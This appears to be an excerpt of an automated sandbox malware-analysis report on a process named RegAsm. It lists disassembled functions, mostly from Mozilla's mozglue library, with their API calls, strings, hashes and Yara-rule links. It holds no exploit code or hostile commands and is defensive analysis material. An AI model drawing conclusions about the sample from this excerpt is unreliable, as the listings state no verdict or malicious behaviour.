Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 305f0fdae167a9ed64d12c4c343eab28bdcc0a8d978a4f2195bbdb9211f58788
Instruction ID: 44b5b5a1e9f48f7c35d5a9dd79de9ab03e9eeb69a2f6f01dd86df616010dbc3b
Opcode Fuzzy Hash: 305f0fdae167a9ed64d12c4c343eab28bdcc0a8d978a4f2195bbdb9211f58788
Instruction Fuzzy Hash: 244168B52007009FDB10DF2AC888A66BBF9FB89314F11446EE95A87B51DB71F814CB95

Function 6C55D210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C525820,?), ref: 6C55D21F
moz_xmalloc.MOZGLUE(00000001,?,?,6C525820,?), ref: 6C55D22E

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C525820,?), ref: 6C55D242
free.MOZGLUE(00000000,?,?,?,?,?,?,6C525820,?), ref: 6C55D253

Part of subcall function 6C535E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C535EDB
Part of subcall function 6C535E90: memset.VCRUNTIME140(ewWl,000000E5,?), ref: 6C535F27
Part of subcall function 6C535E90: LeaveCriticalSection.KERNEL32(?), ref: 6C535FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C525820,?), ref: 6C55D280

Strings

XRl, xrefs: 6C55D23C, 6C55D29E, 6C55D2E3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID: XRl
API String ID: 2029485308-793779599
Opcode ID: d6cda0e24605ae3f492889999db4fb0a0da92af766dd8e6cd2a131c93fdf3597
Instruction ID: ec60afc7c5160f6c1c5ab58017cff4a74f967b833aaf0ebad86e2977fc489ff6
Opcode Fuzzy Hash: d6cda0e24605ae3f492889999db4fb0a0da92af766dd8e6cd2a131c93fdf3597
Instruction Fuzzy Hash: D031F676901215DBCB00CF58CD80AAEBBB5FF89308F64456AD954AB741D372EC16C7E1

Function 6C5238A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C59E220,?,?,?,?,6C523899,?), ref: 6C5238B2
ReleaseSRWLockExclusive.KERNEL32(6C59E220,?,?,?,6C523899,?), ref: 6C5238C3
free.MOZGLUE(00000000,?,00000000,0000002C,?,?,?,6C523899,?), ref: 6C5238F1
RtlFreeHeap.NTDLL ref: 6C523920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C523899,?), ref: 6C52392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C523899,?), ref: 6C523943
RtlFreeHeap.NTDLL ref: 6C52396E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 379eb27924010750db21982e44c23c7e20d1ee9a2a2d960b1c876ead5233db01
Instruction ID: 605a199a120aaadc59ab7e1613f451764d17e94e30d6fa940b1aa2887cdf4b12
Opcode Fuzzy Hash: 379eb27924010750db21982e44c23c7e20d1ee9a2a2d960b1c876ead5233db01
Instruction Fuzzy Hash: 6A21CC72601720DFE7209F15CC80B86B7E9EF85328F168469E95A9BB90C738E845CB90

Function 6C5584E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5584F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C55850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C55851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C55855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C55856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5585AC

Part of subcall function 6C557670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C55767F
Part of subcall function 6C557670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C557693
Part of subcall function 6C557670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C5585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5576A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5585B2

Part of subcall function 6C535E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C535EDB
Part of subcall function 6C535E90: memset.VCRUNTIME140(ewWl,000000E5,?), ref: 6C535F27
Part of subcall function 6C535E90: LeaveCriticalSection.KERNEL32(?), ref: 6C535FB2

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 835f610934e5b58f0395b896b244fd459a26fb98eb080fe82f6d749d16296444
Instruction ID: b3769b4017e6bba59c17c471068b66b5c0e6b10b79e0dff3d61bebcedc8b5240
Opcode Fuzzy Hash: 835f610934e5b58f0395b896b244fd459a26fb98eb080fe82f6d749d16296444
Instruction Fuzzy Hash: A721AD702016019FDB14DF25CC88A5AB7B5AF8430DF95082EE55BC3B42EB31F958CB46

Function 6C521640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C521699
VerSetConditionMask.NTDLL ref: 6C5216CB
VerSetConditionMask.NTDLL ref: 6C5216D7
VerSetConditionMask.NTDLL ref: 6C5216DE
VerSetConditionMask.NTDLL ref: 6C5216E5
VerSetConditionMask.NTDLL ref: 6C5216EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5216F9

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: c7db489bd083a6155f6f301ef1d060d3e1842b5fdd5eae31a60eb37011193624
Instruction ID: 6473c78396532d7d9efeb2fa28248592980ef21c432a31f4ced4148d4b715e2a
Opcode Fuzzy Hash: c7db489bd083a6155f6f301ef1d060d3e1842b5fdd5eae31a60eb37011193624
Instruction Fuzzy Hash: 3721F0B07402486BEB106B648C85FBF72BCEBC6704F064668F6459B5C0C778AD4486A1

Function 6C56D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C56D1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D1F5

Part of subcall function 6C56AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C56AE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D211
GetCurrentThreadId.KERNEL32 ref: 6C56D217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D279
free.MOZGLUE(?), ref: 6C56D2B2

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 296c6eeadeb72b8c1755d5161536d8ae133b4bb6d1c5ca33369b62302970859a
Instruction ID: b5b67edbebefe45042abfd64c2765d63380a429be47f281e618afe736f05cdec
Opcode Fuzzy Hash: 296c6eeadeb72b8c1755d5161536d8ae133b4bb6d1c5ca33369b62302970859a
Instruction Fuzzy Hash: 0E21B171604341DFCB04DF25CC88A9EB7B5FF8A324F11466EE51A87750DB30A909CB96

Function 6C55F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C55F598), ref: 6C55F621

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

GetCurrentThreadId.KERNEL32 ref: 6C55F637
AcquireSRWLockExclusive.KERNEL32(6C59F4B8,?,?,00000000,?,6C55F598), ref: 6C55F645
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8,?,?,00000000,?,6C55F598), ref: 6C55F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C55F62A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 5ae81444cf70c4ffe661a6199df8296173d624e59125650f4aa7d5d9c935417f
Instruction ID: f6ef60bd95c744539150247f8f9c77cf664e2571aaf24e48e3a91df289d37a7b
Opcode Fuzzy Hash: 5ae81444cf70c4ffe661a6199df8296173d624e59125650f4aa7d5d9c935417f
Instruction Fuzzy Hash: 2811E371201244EBDB10AF59CC489A5B77DFFC6358B920196FA0683F41CB32AC21CBA5

Function 6C522070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

LoadLibraryW.KERNEL32(combase.dll,6C521C5F), ref: 6C5220AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C5220CD
__Init_thread_footer.LIBCMT ref: 6C5220E1
FreeLibrary.KERNEL32 ref: 6C522124

Strings

combase.dll, xrefs: 6C5220A9
CoInitializeSecurity, xrefs: 6C5220C7

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 0602a8be0752afda20ae89f2b4e142145ad8f247bfd70b1c3e726a25d635ce0c
Instruction ID: a9cd015ad5337d00c5167c2b43f062211fa4612de361400b0aa30329897d60f5
Opcode Fuzzy Hash: 0602a8be0752afda20ae89f2b4e142145ad8f247bfd70b1c3e726a25d635ce0c
Instruction Fuzzy Hash: 8721CD3A200289EFDF10CF55EC48D9A3FBAFB4A324F024258FE0492651D3719861CFA4

Function 6C5776C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C5776F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C577705

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C577717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C57778F,00000000,00000000,00000000,00000000), ref: 6C577731
free.MOZGLUE(00000000), ref: 6C577760

Strings

}>Ul, xrefs: 6C5776C4

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>Ul
API String ID: 2538299546-355265445
Opcode ID: 9e8587e022368ef8f4bcb51527fcb960c50066b1861a2e820e73d715cc9faff6
Instruction ID: ec36ad0f9feeaf09357187b6f8391eda0b69dbd31f06dbd70682cad16500aed2
Opcode Fuzzy Hash: 9e8587e022368ef8f4bcb51527fcb960c50066b1861a2e820e73d715cc9faff6
Instruction Fuzzy Hash: 4411B6B1901315ABEB20AF769C44B6B7EE8EF45354F044529F848E7300E7749C4087F2

Function 6C5599A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C5599C1
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C5599CE
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C5599F8
GetCurrentThreadId.KERNEL32 ref: 6C559A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C559A0D

Part of subcall function 6C559A60: GetCurrentThreadId.KERNEL32 ref: 6C559A95
Part of subcall function 6C559A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C559A9D
Part of subcall function 6C559A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C559ACC
Part of subcall function 6C559A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C559BA7
Part of subcall function 6C559A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C559BB8
Part of subcall function 6C559A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C559BC9

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C559A15

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 4ee73004082d6e4280ea5708051f0a144f26aa386232cb18876c06035dcdc5af
Instruction ID: 1675a0980f06f8617b8d3bc6b414a0456d0f220403d5be1fea0b869aa1db8926
Opcode Fuzzy Hash: 4ee73004082d6e4280ea5708051f0a144f26aa386232cb18876c06035dcdc5af
Instruction Fuzzy Hash: E00166B5A041A0DBEB106F25DC083B93B78EB82218F430297FD0A43B01C7381C26C7BA

Function 6C521FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C521FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C521FFD
__Init_thread_footer.LIBCMT ref: 6C522011
FreeLibrary.KERNEL32 ref: 6C522059

Strings

combase.dll, xrefs: 6C521FD9
CoCreateInstance, xrefs: 6C521FF7

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: ead6faf040238b4e53745219d8e0bd63fb7ff1f8e7a776556f3a455d17afc5f2
Instruction ID: 36a8cf10892e255cd3d00b02bcc09f7de25755bd58b4305f47618e0bf17db1fb
Opcode Fuzzy Hash: ead6faf040238b4e53745219d8e0bd63fb7ff1f8e7a776556f3a455d17afc5f2
Instruction Fuzzy Hash: 7F118E78200284EFEF20DF15CC4CE5A7BB9FB86365F1241A9FD0582681D7309810CF65

Function 6C520EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C54D9F0,00000000), ref: 6C520F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C520F3C
__Init_thread_footer.LIBCMT ref: 6C520F50
FreeLibrary.KERNEL32(?,6C54D9F0,00000000), ref: 6C520F86

Strings

combase.dll, xrefs: 6C520F18
CoInitializeEx, xrefs: 6C520F36

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: eda91eda06d110ddc447fc0e7ea7f7072119b7227f0d72ad468cc98167e3ab28
Instruction ID: acaf62b47100caea8c007cde678ba2099b15e221171a12baf21e6316d540ce60
Opcode Fuzzy Hash: eda91eda06d110ddc447fc0e7ea7f7072119b7227f0d72ad468cc98167e3ab28
Instruction Fuzzy Hash: 1211C2743422C0DBDF20DF55CD18A9E37B8FB8A325F1343AAF90592B82D734A805CA59

Function 0041FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041FA6D
DName::operator+.LIBCMT ref: 0041FA74
DName::DName.LIBCMT ref: 0041FA96
DName::operator+.LIBCMT ref: 0041FA9D
DName::operator+.LIBCMT ref: 0041FAA4

Strings

throw(, xrefs: 0041FA65, 0041FA8E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C

Function 6C5262E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6C52631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6C52633A
__Init_thread_footer.LIBCMT ref: 6C52634E
FreeLibrary.KERNEL32 ref: 6C526376

Strings

combase.dll, xrefs: 6C526316
CoUninitialize, xrefs: 6C526334

Memory Dump Source

